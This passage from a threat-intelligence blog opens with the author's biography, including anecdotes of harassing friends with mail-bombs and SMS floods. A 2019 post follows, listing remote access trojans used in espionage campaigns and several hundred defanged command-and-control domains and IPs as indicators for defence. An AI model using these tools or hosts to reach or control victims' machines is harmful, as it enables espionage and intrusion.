in the context of enriching and disseminating actionable Threat Intelligence on a variety of U.S Intelligence

Community including academic partners throughout the past decade successfully leading me to participate in a Top

Secret GCHQ Surveillance and Monitoring Program basically keeping track of hackers and security researchers on

Twitter for proactive Cyber Defense and OSINT purposes called " [33]Lovely Horse" including a possible "4th Party Collection" trend-setting initiative circa 2008-2013 labeling some of my research as a possible "4th Party Collection"

partner of U.S Intelligence Community including the [34]tracking and take down of the Koobface botnet including

my experience as a Managing Director of "The Underground" also known as [35]Astalavista Security Group’s

Astalavista.com ([36]Security Interviews - Part 01; [37]Security Interviews - Part 02; [38]Security Interviews - Part 03) throughout 2003-2006 with my ex-girlfriend now partner in life - Yordanka Ilieva - when we used to rock the boat

- and are prone to do so. Takes you back doesn’t it? Keep reading.

Personal Photo of bedroom hacker - today’s leading expert in the field of cybercrime research security blogging

and threat intelligence gathering - Dancho Danchev also known as the tHe mAnIaC circa the 90’s with his hacker

girlfriend - Yordanka Ilieva - including various personal projects circa the 90’s
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• I happen to have directly established a connection with one of the primary Sub7 Trojan Horse authors HeLL-

fiReZ which makes me pretty close to [39]Steve Gibson in one way or another - throughout the 90’s where

we exchanged Trojan Horse samples while I was busy working for Trojan Defense Suite and the infamous Lock-

down2000 anti-trojan software suite where I was busy working on signatures and help-guides compilation while

I was also busy being a member of several hacking groups primarily found on the Cyberarmy.com Top 50 Hacking

List including Progenic.com Top 100 hacking sites list.

• Mail-bombing was a trend - in particular my personal experience of making jokes with friends who were unable

to take care of 100+ email messages in their Inbox

• Mass-Mailing List subscription - in particular the fact that my friends were not capable of finding a productive

way to get rid of the messages and unsubscribe themselves

• Telephony Denial of Service attack circa the 90’s exploiting a popular for Eastern Europe Mail2SMS mobile

provider feature - in particular the fact that it’s not necessarily a pleasant experience to get rid of 100+ SMS

messages received in a short-period of time

• "Lawful Interception" of friends - something else that I’m not particularly proud of is my "lawful surveillance"

and "lawful interception" experience and capabilities of people that I knew and that I used to know largely

driven by the need to explore and learn more

978

• Corporate Experience in the field of anti-trojan detection technologies and categorization - in particular my experience in creating trojan horse signatures and writing actual technical descriptions for the purpose of improving my employer’s overall detection rate for a variety of trojan horse vendors circa the 90’s.

Do you remember my work from the 90’s? Are you familiar with the Scene circa the 90’s? Feel free to approach me -

disruptive.individuals@gmail.com or make a PayPal donation using my PayPal ID: dancho.danchev@hush.com for

the purpose of fueling growth into my research.
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Massive Portfolio of APT (Advanced Persistent Threat) and RAT (Remote Access Tools) Domains Spotted

in the Wild - An Analysis (2019-09-20 17:17)

In a world dominated by thousands of currently active APT (Advanced Persistent Threat) campaigns also known as

Remote Access Tools (RATs) including trojan horses it’s worth pointing out that novice cybercriminals continue relying

and actively utilizing a variety of commercial and publicly obtainable DIY (do-it-yourself) Remote Access Tools (RATs)

for the purpose of committing cyber espionage and launching malicious and fraudulent cyber espionage themed

campaigns targeting thousands of users including companies and nation-state actors.

In this post I’ll provide actionable intelligence on some of the most popular RAT (Remote Access Tools) cur-

rently utilized for APT (Advanced Persistent Threat) type of nation-state sponsored and tolerated cyber espionage

themed campaigns including an in-depth discussion on a massive domain portfolio of currently active C &C server

IPs known to have participated in a variety of APT (Advanced Persistent Threat) type of cyber espionage campaigns

throughout 2015-2019.

Among the most popular APT (Advanced Persistent Threat) and Remote Access Tools (RATs) releases based

on my public and proprietary sensor network remain the following currently obtainable commercial and publicly

obtainable tools:

• Casa RAT

• Bandook RAT

• Dark Comet Rat
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• Cerberus

• Cybergate

• Blackshades

• Poison Ivy

• Schwarze Sonne RAT

• Syndrome RAT

• Team Viewer

• Y3k RAT

• Snoopy

• 5p00f3r.N $ RAT

• SpyNet

• P. Storrie RAT

• Turkojan Gold

• Bifrost

• Beast

• Shark

• Pain RAT

• xHacker Pro RAT

• Seed RAT

• Optix Pro RAT

• Dark Moon

• NetDevil

• Deeper RAT

• MiniMo RAT

• Alusinus RAT v0.8

• Babylon 1.6.0.0

• Bozok 1.4.3

• BX RAT v1.0

• Cloud Net RAT

• Comet RAT v0.1.4

• Coringa-RAT v0.1
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• Crimson 3.0.0

• Crimson RAT 2.2.6

• ctOs 1.3.0.0

• CyberGate v1.01.12

• Dark Comet 5.3

• DarkComet Legacy

• DH Rat 0.3

• D-RAT

• Frutas RAT v0.9

• Greame RAT v1.9

• HAKOPS RAT v2

• Imminent Monitor 3.9.0.0

• Imperium RAT Cracked

• jRat

• jSpy

• jSpy RAT v0.09

• KilerRat V 10.0.0

• L6-RAT Beta

• Maus 2.0b

• Mega RAT 1.5 Beta

• MLRAT

• MQ5 RAT

• NanoCore 1.2.2.0

• NingaliNET v1.1.0.0

• NjRAT 0.7

• njRAT v0.8d By Nasser2012

• njworm

• NovaLite v3.0

• Nuclear RAT 2.1.0

• Orion RAT 0.9 Free

• Pandora RAT V1.1
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• Paradox RAT

• Proton 1.1.0.6

• pupy-master

• Poison Ivy

• Quasar 1.1 + Source

• QuasarRAT v1.3.0.0

• Rabbit-Hole Autoit RAT v1.0 Beta 2

• Revenge RAT v0.1

• SkyWyder 2.2

• Spycronic 1.02.1

• Spygate 2.6

• SpyGate-RAT 3.3

• SpyNet 0.7 Public

• Spy-Net v2.6

• Turkojan 4.0 Gold

• ucuL v1.1

• Vantom RAT

• Virus Rat v8.0 Beta

• Xena Rat 2.0

• xRAT 2.0

Related domains and IPs known to have participated in various APT (Advanced Persistent Threat) and Remote

Access Tools (RATs) type of malicious and fraudulent campaigns throughout 2015-2019:

hxxp://009boot.ddns.net/

hxxp://104.144.198.115/

hxxp://105.105.104.198/

hxxp://105.105.173.58/

hxxp://105.105.185.105/

hxxp://109.201.189.13/

hxxp://111.221.29.254/

hxxp://115.126.219.31/

hxxp://118.26.141.209/

hxxp://118.26.141.210/

hxxp://122.46.15.164/

hxxp://123unk123.ddns.net/

hxxp://13.124.168.74/

hxxp://130.25.242.66/

hxxp://133katelinn.hopto.org/
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hxxp://138.130.206.150/

hxxp://139.162.175.167/

hxxp://141.255.159.3/

hxxp://149.129.133.195/

hxxp://149.3.143.104/

hxxp://151.101.2.110/

hxxp://160.202.163.243/

hxxp://167.108.52.154/

hxxp://167.116.22.242/

hxxp://167.116.32.152/

hxxp://167.116.48.151/

hxxp://167.99.251.51/

hxxp://177.130.49.118/

hxxp://178.54.139.105/

hxxp://179.125.62.162/

hxxp://179.221.42.45/

hxxp://18.218.228.132/

hxxp://180.68.114.205/

hxxp://181.214.55.23/

hxxp://181.46.172.191/

hxxp://181.52.105.187/

hxxp://185.125.205.81/

hxxp://185.125.205.91/

hxxp://185.148.241.58/

hxxp://185.208.211.235/

hxxp://185.209.85.74/

hxxp://185.254.183.115/

hxxp://185.31.161.186/

hxxp://185.56.90.77/

hxxp://185.81.157.24/

hxxp://185.82.216.57/

hxxp://185.84.181.89/

hxxp://186.118.110.209/

hxxp://186.118.111.142/

hxxp://188.165.224.26/

hxxp://188.2.137.168/

hxxp://188.54.182.240/

hxxp://188.54.184.36/

hxxp://188.66.7.124/

hxxp://188.72.104.64/

hxxp://188.83.129.33/

hxxp://189.47.113.180/

hxxp://189.47.114.215/

hxxp://191.101.22.196/

hxxp://192.169.69.25/

hxxp://194.182.73.173/

hxxp://194.5.98.56/

hxxp://197.207.219.206/

hxxp://2.20.242.8/

hxxp://2.21.242.237/
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hxxp://201.208.105.81/

hxxp://202.195.210.218/

hxxp://204.44.78.113/

hxxp://211.108.133.241/

hxxp://211.44.166.16/

hxxp://212.129.42.206/

hxxp://212.133.210.232/

hxxp://212.47.247.76/

hxxp://212.7.208.105/

hxxp://212.83.170.126/

hxxp://213.183.58.39/

hxxp://213.208.129.200/

hxxp://217.103.124.136/

hxxp://218.204.141.228/

hxxp://220.124.23.84/

hxxp://23.105.131.162/

hxxp://25.66.198.77/

hxxp://34.211.181.161/

hxxp://35.176.10.40/

hxxp://37.104.186.158/

hxxp://37.115.47.107/

hxxp://41.101.5.34/

hxxp://41.102.235.191/

hxxp://41.58.69.217/

hxxp://41.58.96.58/

hxxp://43.254.134.157/

hxxp://45.76.87.6/

hxxp://46.164.167.42/

hxxp://46.246.5.130/

hxxp://46.246.85.131/

hxxp://5.101.170.159/

hxxp://5.187.49.231/

hxxp://5.188.231.235/

hxxp://5.34.183.64/

hxxp://52.138.216.83/

hxxp://52.87.114.116/

hxxp://56d8a1a6.hopto.org/

hxxp://60.10.0.13/

hxxp://62.235.139.42/

hxxp://63.237.57.222/

hxxp://65.184.25.147/

hxxp://66fmicro.duckdns.org/

hxxp://68.53.163.100/

hxxp://6alexander9.ddns.net/

hxxp://76.73.114.50/

hxxp://77.139.164.191/

hxxp://77.48.28.227/

hxxp://78.12.174.157/

hxxp://78.12.177.32/

hxxp://78.130.176.162/
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hxxp://79.134.225.116/

hxxp://81.231.10.43/

hxxp://81.61.79.44/

hxxp://84.151.157.38/

hxxp://85.110.45.5/

hxxp://87.11.97.192/

hxxp://89.134.165.187/

hxxp://90.96.103.203/

hxxp://92.122.53.40/

hxxp://92.222.112.70/

hxxp://94.183.210.219/

hxxp://94.237.28.110/

hxxp://95.100.252.51/

hxxp://95.154.199.21/

hxxp://a5la8y1201.ddns.net/

hxxp://aa123.zapto.org/

hxxp://aaaa5.hopto.org/

hxxp://abdodz.ddns.net/

hxxp://abdou1234.hopto.org/

hxxp://abdulla244.myftp.biz/

hxxp://abidas2018.ddns.net/

hxxp://abo6na.no-ip.org/

hxxp://abrilparadon.duckdns.org/

hxxp://adidas2018.ddns.net/

hxxp://aditrix.ddns.net/

hxxp://adminirq.no-ip.biz/

hxxp://adsfca.duckdns.org/

hxxp://agbero.duckdns.org/

hxxp://ahlanc500.zapto.org/

hxxp://ahmad025.ddns.net/

hxxp://ahmed461.ddns.net/

hxxp://ahmedhero2020.zapto.org/

hxxp://ahmedmhmed4711.ddns.net/

hxxp://ahmedstar123.ddns.net/

hxxp://ahmetabis.duckdns.org/

hxxp://akramhbcl.ddns.net/

hxxp://alaa170.hopto.org/

hxxp://aldiwani.no-ip.biz/

hxxp://alemania.duckdns.org/

hxxp://alger07.ddns.net/

hxxp://ali11.sytes.net/

hxxp://ali123.ddns.net/

hxxp://alicemedrado.no-ip.org/

hxxp://alihacker2018.no-ip.biz/

hxxp://alihazm2017.no-ip.biz/

hxxp://aliking123.ddns.net/

hxxp://alisami.hopto.org/

hxxp://alkal.publicvm.com/

hxxp://almlk.ddns.net/

hxxp://alone.sytes.net/
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hxxp://alsha2e.zapto.org/

hxxp://am22am.ddns.net/

hxxp://amana1.duckdns.org/

hxxp://ambush.ddns.net/

hxxp://amerkad19.ddns.net/

hxxp://aminesaflo.hopto.org/

hxxp://amjad.no-ip.org/

hxxp://amma.myftp.biz/

hxxp://ammar906klashnkof.myq-see.com/

hxxp://anahowa.duckdns.org/

hxxp://anamzh.ddns.net/

hxxp://android68.ddns.net/

hxxp://andynox2018.myddns.me/

hxxp://annonymous1921.ddns.net/

hxxp://anonyklax.duckdns.org/

hxxp://anonymato.duckdns.org/

hxxp://anonymous1999.hopto.org/

hxxp://anonymoushora032.ddns.net/

hxxp://aoa.myq-see.com/

hxxp://apatednsnet.duckdns.org/

hxxp://arabyouman.sytes.net/

hxxp://arielpica.ddns.net/

hxxp://asd10.ddns.net/

hxxp://asdaasda.ddns.net/

hxxp://assurancework.ddns.net/

hxxp://avast666.duckdns.org/

hxxp://azeezdeaf1122.ddns.net/

hxxp://azeezdeaf1996.hopto.org/

hxxp://azzaenstp.no-ip.biz/

hxxp://b3d3h3ckd.ddns.net/

hxxp://bachir12345.hopto.org/

hxxp://badnulls.hopto.org/

hxxp://barakat.servegame.com/

hxxp://basyouni4.ddns.net/

hxxp://bbus19.ddns.net/

hxxp://becharakam.ddns.net/

hxxp://bedwipro987.ddns.net/

hxxp://bellevie.duckdns.org/

hxxp://benjamin1996.ddns.net/

hxxp://benjamin1996121.ddns.net/

hxxp://betterlifecommerce.ddns.net/

hxxp://bibich.myftp.biz/

hxxp://bkjy1122334455.ddns.net/

hxxp://blakbass.linkpc.net/

hxxp://bob2030.ddns.net/

hxxp://bobyhack.duckdns.org/

hxxp://brothersjoy.nl/

hxxp://bug000.hopto.org/

hxxp://by-sabotage123.duckdns.org/

hxxp://by900.zapto.org/
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hxxp://c.top4top.net/

hxxp://cabbac.ddns.net/

hxxp://caoi111.ddns.net/

hxxp://carding.hopto.org/

hxxp://carrochevere.no-ip.biz/

hxxp://casinonono.ddns.net/

hxxp://cerbere9889.ddns.net/

hxxp://cg.ddns.net/

hxxp://chazun.ddns.net/

hxxp://cheatkogama.ddns.net/

hxxp://chinzo.myftp.biz/

hxxp://chrom.webhop.info/

hxxp://chrome1.hopto.org/

hxxp://chrome2018.zapto.org/

hxxp://civita2.no-ip.biz/

hxxp://claxysme.ddns.net/

hxxp://clay157.no-ip.org/

hxxp://clivoucanada.no-ip.org/

hxxp://clmodding.ddns.net/

hxxp://cobaiadanet.duckdns.org/

hxxp://connectionsdfghhh.myftp.biz/

hxxp://connectionsxxx.ddns.net/

hxxp://cownzhackr.ddns.net/

hxxp://crazy-evil.no-ip.biz/

hxxp://creazionisa.com/

hxxp://cule.ddns.net/

hxxp://dabii.ddns.net/

hxxp://daisy101.ddns.net/

hxxp://darkfag1337.hopto.org/

hxxp://darkmonster255.ddns.net/

hxxp://darkvador.duckdns.org/

hxxp://dataday.no-ip.org/

hxxp://dd00ddee.ddns.net/

hxxp://ddlink2.ddns.net/

hxxp://ddns.catamosky.biz/

hxxp://ddnsrat.ddns.net/

hxxp://deity.ddns.net/

hxxp://delightc.myftp.biz/

hxxp://devsex.ddns.net/

hxxp://dhayan.ddns.net/

hxxp://dinamarca.duckdns.org/

hxxp://dixenweb.ddns.net/

hxxp://dl.dropbox.com/

hxxp://doc.internetdocss.com/

hxxp://doctordido.no-ip.org/

hxxp://dontexe.duckdns.org/

hxxp://dooooox.ddns.net/

hxxp://doublekits.duckdns.org/

hxxp://dr-prohak.myddns.me/

hxxp://duckdns.org/
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hxxp://duconunun.ddns.net/

hxxp://dzad.ddns.net/

hxxp://ecksdi.ddns.net/

hxxp://ejiroprecious.ddns.net/

hxxp://elmagic2.ddns.net/

hxxp://emad1300.ddns.net/

hxxp://emad1987.myq-see.com/

hxxp://emilylattaa4111.serveftp.com/

hxxp://empezarll.mywire.org/

hxxp://ena.sytes.net/

hxxp://enero.duckdns.org/

hxxp://enghackernoip.ddns.net/

hxxp://essam554.hopto.org/

hxxp://essssssam.ddns.net/

hxxp://ethicalhacking.myftp.biz/

hxxp://evilgseguiyerrt.ddns.net/

hxxp://eyocbp.duckdns.org/

hxxp://ezelogs.ddns.net/

hxxp://fadiana1995.ddns.net/

hxxp://fanddes.ddns.net/

hxxp://fbscam.myftp.biz/

hxxp://fd8a8df5.ddns.net/

hxxp://felestine.hopto.org/

hxxp://fidrali.no-ip.biz/

hxxp://fileserv004.ddns.net/

hxxp://fitnesswebsite.duckdns.org/

hxxp://fo2sha1.myq-see.com/

hxxp://focariongorda.duckdns.org/

hxxp://fortoriko.ddns.net/

hxxp://freelancertupidor.myftp.org/

hxxp://freetools.hldns.ru/

hxxp://frsyescd.ddns.net/

hxxp://fsoc.ddns.net/

hxxp://fudman.duckdns.org/

hxxp://fw2.sshreach.me/

hxxp://gamezerer.ddns.net/

hxxp://gangshitxd.bounceme.net/

hxxp://ggwp123.ddns.net/

hxxp://ghanaandco.sytes.net/

hxxp://giannigianni.ddns.net/

hxxp://giustini.ddns.net/

hxxp://glendyling.ddns.net/

hxxp://gobali.hopto.org/

hxxp://gogotest-46542.portmap.io/

hxxp://goodattack.ddns.net/

hxxp://googlechromehost.ddns.net/

hxxp://googlehotspotxxxx.no-ip.biz/

hxxp://gorel1004.ze.am/

hxxp://gr44.ddns.net/

hxxp://grrrfggfgfg.ddns.net/
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hxxp://gujulio.duckdns.org/

hxxp://gustavomaxwell.ddns.net/

hxxp://gvgvgv.ddns.net/

hxxp://hack2rio.hopto.org/

hxxp://hacker-soft.ddns.net/

hxxp://hackingloading157.ddns.net/

hxxp://hackrooo.ddns.net/

hxxp://hahwa0404.ddns.net/

hxxp://haider2002.ddns.net/

hxxp://haider2121.hopto.org/

hxxp://hakanonymos4.ddns.net/

hxxp://hakerbatna.ddns.net/

hxxp://hakerz123.ddns.net/

hxxp://hakoukh40.ddns.net/

hxxp://hakrbatna.hopto.org/

hxxp://hakrdz111.serveftp.com/

hxxp://haniameer.hopto.org/

hxxp://haram222.ddns.net/
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hxxp://96750513.ddns.net/

hxxp://9949291099.hopto.org/

hxxp://a.tomx.xyz/

hxxp://a1b2c3.hopto.org/

hxxp://aagaro.ddns.net/

hxxp://aasxzxdsc12324.no-ip.biz/

hxxp://abarouter.ddns.net/

hxxp://abbaass313.hopto.org/

hxxp://abbaass3132.hopto.org/

hxxp://abcccabccab.ddns.net/

hxxp://abderrahmane16.hopto.org/

hxxp://abdo099.ddns.net/

hxxp://abdobacha05.ddns.net/

hxxp://abdou16.hopto.org/

hxxp://abdouoahmed.ddns.net/

hxxp://abduls0821.myddns.me/

hxxp://abinova.ddns.net/

hxxp://abosaoys881.duia.us/

hxxp://abs3nt.ddns.net/

hxxp://achrafzouina.zapto.org/

hxxp://ad15.hopto.org/

hxxp://adelxxbx.no-ip.biz/

hxxp://adesja1337.no-ip.biz/
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hxxp://adlin.duckdns.org/

hxxp://adobflash.hopto.org/

hxxp://aerror.no-ip.biz/

hxxp://ahag3ld1.ddns.net/

hxxp://ahmdiand-wj3.ddns.net/

hxxp://ahmed12345.hoptp.org/

hxxp://ahmed2012.dynu.com/

hxxp://ahmed90011912.ddns.net/

hxxp://ahmedmidoegypt.hopto.org/

hxxp://ahomdalhomd42.hopto.org/

hxxp://ala6a.no-ip.biz/

hxxp://alaajb.zapto.org/

hxxp://alaauy.ddns.net/

hxxp://alabama192837.no-ip.org/

hxxp://alanbkey.no-ip.org/

hxxp://alarr2012ab.myftp.biz/

hxxp://albash2222.ddns.net/

hxxp://ali2627.ddns.net/

hxxp://ali7070.ddns.net/

hxxp://aliboxboxbox.hopto.org/

hxxp://alkingahmed555.ddns.net/

hxxp://alldebrid.duckdns.org/

hxxp://allforfree.game-host.org/

hxxp://alpheron.duckdns.org/

hxxp://alzintani.ddns.net/

hxxp://amarok58.no-ip.biz/

hxxp://amelwafaw.ddns.net/

hxxp://aminamadani16.hopto.org/

hxxp://aminbatna31.ddns.net/

hxxp://aminecity.ddns.net/

hxxp://aminrahimzadeh.no-ip.org/

hxxp://amiraliam.ddns.net/

hxxp://amirhosein0074.ddns.net/

hxxp://ammaar938.ddns.net/

hxxp://ampala.ddns.net/

hxxp://amran-pc.no-ip.biz/

hxxp://amrozamrozamroz.hopto.org/

hxxp://amrsamy222.ddns.net/

hxxp://amsdj.hopto.org/

hxxp://an.droidsuper.su/

hxxp://anawebs.ddns.net/

hxxp://andr01d.zapto.org/

hxxp://andrew999.ipnodns.ru/

hxxp://andriod91.ddns.net/

hxxp://andro0161.no-ip.info/

hxxp://andro123.duckdns.org/

hxxp://androduck.duckdns.org/

hxxp://android.no-ip.org/

hxxp://android1385.ddns.net/

hxxp://androidalbums.ddns.net/
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hxxp://androidan.ddns.net/

hxxp://androidbra.duckdns.org/

hxxp://androidfdl.ddns.net/

hxxp://androidrat21.ddns.net/

hxxp://androidsafe.ddns.net/

hxxp://androidtest0.ddns.net/

hxxp://androidtool.ddns.net/

hxxp://androidupdate.ddns.net/

hxxp://androjak.myftp.org/

hxxp://androrat1226.ddns.net/

hxxp://androrat22.ddns.net/

hxxp://androratbtas.no-ip.info/

hxxp://androratvirgin.duckdns.org/

hxxp://andver18.no-ip.biz/

hxxp://anishmishra66.ddns.net/

hxxp://anito.ddns.net/

hxxp://anon008.ddns.net/

hxxp://anondz97.ddns.net/

hxxp://anonimousdre180.ddns.net/

hxxp://anonvirus.ddns.net/

hxxp://anonymo9s.ddns.net/

hxxp://apkhamza.ddns.net/

hxxp://applecenikosmos.hldns.ru/

hxxp://appsystem.ddns.net/

hxxp://aqwkdo1.no-ip.biz/

hxxp://ariaaalikazm.ddns.net/





hxxp://arondograu.ddns.net/

hxxp://asasasas22.ddns.net/

hxxp://asdbh11.ddns.net/

hxxp://askinder.hopto.org/

hxxp://astro3.hopto.org/

hxxp://atsizinoglu.duckdns.org/

hxxp://auc.dlinkddns.com/

hxxp://awir-fb.sytes.net/

hxxp://axxz2017.ddns.net/

hxxp://ayadd99.ddns.net/

hxxp://ayham11.hopto.org/

hxxp://azerboys.hopto.org/

hxxp://azert123.ddns.net/

hxxp://azerty.hopto.org/

hxxp://aziza.sytes.net/

hxxp://baby.webhop.me/

hxxp://badguy.myq-see.com/

hxxp://bahar2017.no-ip.org/

hxxp://bahoom.no-ip.biz/

hxxp://banis.hopto.org/

hxxp://bannding.ddns.net/

hxxp://bapforall.ddns.net/

hxxp://barbari.ddns.net/

hxxp://batterysaver.3utilities.com/

1002

hxxp://behnamhack.ddns.net/

hxxp://beijg.3322.org/

hxxp://bensphonetracker.ddns.net/

hxxp://bitoandroid.no-ip.info/

hxxp://bl4ckh0t.ddns.net/

hxxp://bl4ckhatjoker.ddns.net/

hxxp://black1990.ddns.net/

hxxp://blackghostdc.duckdns.org/

hxxp://blackghostorg.ddns.net/

hxxp://blind1234.ddns.net/

hxxp://boinserver12.no-ip.info/

hxxp://bopress.ddns.net/

hxxp://boubou271.ddns.net/

hxxp://brasilteamop.ddns.net/

hxxp://brousse16.ddns.net/

hxxp://bwaleez.hopto.org/

hxxp://camper92.ddns.net/

hxxp://carapuce-2015.no-ip.biz/

hxxp://cccamd.myftp.biz/

hxxp://cerdofile.ddns.net/

hxxp://chabar.ddns.net/

hxxp://chacal00.hopto.org/

hxxp://changyu231.ddns.net/

hxxp://chrisfo.no-ip.org/

hxxp://city55.hopto.org/

hxxp://cjbks0u0.no-ip.org/

hxxp://clashdroid.no-ip.biz/

hxxp://clayhost.hopto.org/

hxxp://comet.myftp.org/

hxxp://comsurogate.noip.me/

hxxp://coxiamigo.myq-see.com/

hxxp://createmeon.zapto.org/

hxxp://cricbot.no-ip.info/

hxxp://crisprueba.ddns.net/

hxxp://cyberandro.duckdns.org/

hxxp://cyberbit.ddns.net/

hxxp://cybercrysis.ddns.net/

hxxp://dalibob12.ddns.net/

hxxp://damndamn.ddns.net/

hxxp://dangerlove.no-ip.biz/

hxxp://danialdelta.ddns.net/

hxxp://danialmostafaei.no-ip.biz/

hxxp://daniele3814.ddns.net/

hxxp://danielrats.ddns.net/

hxxp://dantehack.zapto.org/

hxxp://daroedkak.no-ip.biz/

hxxp://darweshfis.no-ip.org/

hxxp://datadownloader.ddns.net/

hxxp://dddeee.ddns.net/

hxxp://ddns.net/
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hxxp://deep1234.ddns.net/

hxxp://dellearm.ddns.net/

hxxp://dendroid.hopto.org/

hxxp://denishul.hldns.ru/

hxxp://detlef-gmbh.tk/

hxxp://dexonic.duckdns.org/

hxxp://diceedicee.ddns.net/

hxxp://didi03.duckdns.org/

hxxp://dionis.ddns.net/

hxxp://djack1.zapto.org/

hxxp://dkms.ddns.net/

hxxp://dltelegram.ddns.net/

hxxp://dodotototata.publicvm.com/

hxxp://dogecoinspeed.zapto.org/

hxxp://domeer-android.ddns.net/

hxxp://domira.ddns.net/

hxxp://draagon.ddns.net/

hxxp://dragonhkr1.myftp.biz/

hxxp://drhack.hopto.org/

hxxp://driodrac.ddns.net/

hxxp://droid.fagdns.com/

hxxp://droid.freedynamicdns.org/

hxxp://droidcraftismelmao.ddns.net/

hxxp://droidge.ddns.net/

hxxp://droidhost.zapto.org/

hxxp://droidjaack.zapto.org/

hxxp://droidjack.hopto.org/

hxxp://droidjack1.sytes.net/

hxxp://droidjack121.ddns.net/

hxxp://droidjack2137.hopto.org/

hxxp://droidjack228.ddns.net/

hxxp://droidjack2333.ddns.net/

hxxp://droidjack258.bounceme.net/

hxxp://droidjackdns.duckdns.org/

hxxp://droidjackiam.ddnsking.com/

hxxp://droidjackisgodly.ddns.net/

hxxp://droidjackkk.sytes.net/

hxxp://droidjackv5.ddns.net/

hxxp://droidjock.myftp.biz/

hxxp://droidmosa.ddns.net/

hxxp://droidnigga.zapto.org/

hxxp://droidspy.zapto.org/

hxxp://droidss.noip.me/

hxxp://droy.zapto.org/

hxxp://drrazikhan.no-ip.info/

hxxp://duckem.duckdns.org/

hxxp://ducmanhhoangtran.ddns.net/

hxxp://duke5010.duckdns.org/

hxxp://duyguseliberkay.no-ip.biz/

hxxp://dzhacker16.ddns.net/

1004

hxxp://e777kx47.ddns.net/

hxxp://egytiger.myftp.org/

hxxp://ehsanmaali.ddns.net/

hxxp://ehsanmaali3.ddns.net/

hxxp://eldiablo.no-ip.biz/

hxxp://elisou19.ddns.net/

hxxp://emme.no-ip.biz/

hxxp://engnngns.duckdns.org/

hxxp://engrid.no-ip.biz/

hxxp://equisde.ddns.net/

hxxp://erikatersptra.ddns.net/

hxxp://esharj.ddns.net/

hxxp://eslam87.hopto.org/

hxxp://essalhi2047.hopto.org/

hxxp://euquerotchu.ddns.net/

hxxp://explosif.zapto.org/

hxxp://extgta.tk/

hxxp://facebook2ww290.ddns.net/

hxxp://facrbook.redirectme.net/

hxxp://fadisesubaih.ddns.net/

hxxp://farzan.ddns.net/

hxxp://fateh2017.ddns.net/

hxxp://fati43030.no-ip.biz/

hxxp://fatiha29.ddns.net/

hxxp://fenon158.ddns.net/

hxxp://ferzo1881.duckdns.org/

hxxp://fifi147fifi.no-ip.biz/

hxxp://firenzonne.com/

hxxp://firsthost.ddns.net/

hxxp://flashplayerxx.no-ip.org/

hxxp://florian-pc.ksueyuj0mtxpt6gn.myfritz.net/

hxxp://free1.neiwangtong.com/

hxxp://freepalestine.ddns.net/

hxxp://fsocfsoc.ddns.net/

hxxp://fukeyou12.myftp.biz/

hxxp://gaabar.hopto.org/

hxxp://galau.ddns.net/

hxxp://gemini85.hopto.org/

hxxp://gentel901.no-ip.org/

hxxp://geocheats2.eu/

hxxp://gert44.duckdns.org/

hxxp://ggwasgeht.ddns.net/

hxxp://ghanim2017.ddns.net/

hxxp://ghanou1603.no-ip.info/

hxxp://gmailss11.hopto.org/

hxxp://goggle.sytes.net/

hxxp://gold5000.ddns.net/

hxxp://gooboom.no-ip.biz/

hxxp://good.myddns.me/

hxxp://goog2.no-ip.biz/
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hxxp://googlead.publicvm.com/

hxxp://googles.servemp3.com/

hxxp://googleweb.ddns.net/

hxxp://gooogleplay.ddns.net/

hxxp://gorr.hopto.org/

hxxp://goshasb.ddns.net/

hxxp://grandeamore.ddns.net/

hxxp://great-support.com/

hxxp://greatkeyboard.hopto.org/

hxxp://gruposoluciomatica.com.br/

hxxp://gta5hacking12.duckdns.org/

hxxp://gusui1.ddns.net/

hxxp://haa7aah.no-ip.biz/

hxxp://habbo.no-ip.org/

hxxp://habib1376.ddns.net/

hxxp://habib556.ddns.net/

hxxp://hac123k.hopto.org/

hxxp://hachim07reg.no-ip.info/

hxxp://hack1111.noip.me/

hxxp://hack155.vicp.net/

hxxp://hacked2001.hopto.org/

hxxp://hacker-81.no-ip.biz/

hxxp://hacker2.hopto.org/

hxxp://hacker421.hopto.org/

hxxp://hackermoqtada.no-ip.biz/

hxxp://hackertn123.no-ip.biz/

hxxp://hackhack2016.no-ip.info/

hxxp://hackhamer.zapto.org/

hxxp://hackinroll.ddns.net/

hxxp://hackme.no-ip.org/

hxxp://hacksd20.ddns.net/

hxxp://hacksyria2.myftp.biz/

hxxp://hadsurvey.ddns.net/

hxxp://hahalol.ddns.net/

hxxp://hahalol.no-ip.biz/

hxxp://haiderhacer12.no-ip.biz/

hxxp://hajeeeee.hopto.org/

hxxp://hakedpc0000.myftp.biz/

hxxp://hakeerali2.ddns.net/

hxxp://haker-2119.ddns.net/

hxxp://haker10.ddns.net/

hxxp://hakosiken.duckdns.org/

hxxp://hakunamatata007.ddns.net/

hxxp://hala222.hopto.org/

hxxp://halo12.duckdns.org/

hxxp://hamidos1342.ddns.net/

hxxp://hamker.ddns.net/

hxxp://hamo55.hopto.org/

hxxp://hamza19991.hopto.org/

hxxp://hamzaelcb.ddns.net/

1006

hxxp://hananox.ddns.net/

hxxp://hardstyleraver.no-ip.org/

hxxp://haroune12.myddns.me/

hxxp://hasha.hopto.org/

hxxp://hasn9999.ddns.net/

hxxp://hassan100.ddns.net/

hxxp://hassanabd1233.ddns.net/

hxxp://hatam.no-ip.org/

hxxp://havij.ddns.net/

hxxp://haxor.hopto.org/

hxxp://haxorjib.no-ip.org/

hxxp://hazem123.no-ip.biz/

hxxp://hazhar77.no-ip.biz/

hxxp://hedr78.ddns.net/

hxxp://heemoana.hopto.org/

hxxp://hegazy5753.ddns.net/

hxxp://hehe.duckdns.org/

hxxp://heikechenmo.3322.org/

hxxp://heilbronn.duckdns.org/

hxxp://hell2066.zapto.org/

hxxp://helloandroid.no-ip.org/

hxxp://hero400.ddns.net/

hxxp://hhhhhfhf.ddns.net/

hxxp://hmt1985.ddns.net/

hxxp://hobi.3utilities.com/

hxxp://hoho121292.ddns.net/

hxxp://hoho39.ddnc.net/

hxxp://hohoangpmy.ddns.net/

hxxp://hooman8219.servecounterstrike.com/

hxxp://hopto.org/

hxxp://hoseenoori2277kh.ddns.net/

hxxp://hossam3030.ddns.net/

hxxp://hossar.ddns.net/

hxxp://hosteng123.hopto.org/

hxxp://hosthack25.ddns.net/

hxxp://houaribey4.ddns.net/

hxxp://houaribey4.no-ip.org/

hxxp://houssmes.zapto.org/

hxxp://hqn.ddns.net/

hxxp://htmp.sytes.net/

hxxp://huhuhuya.ddns.net/

hxxp://hussein1889.no-ip.biz/

hxxp://husshacka.hopto.org/

hxxp://i1993.ddns.net/

hxxp://imad2001bo.hopto.org/

hxxp://indusv00.duckdns.org/

hxxp://info.bounceme.net/

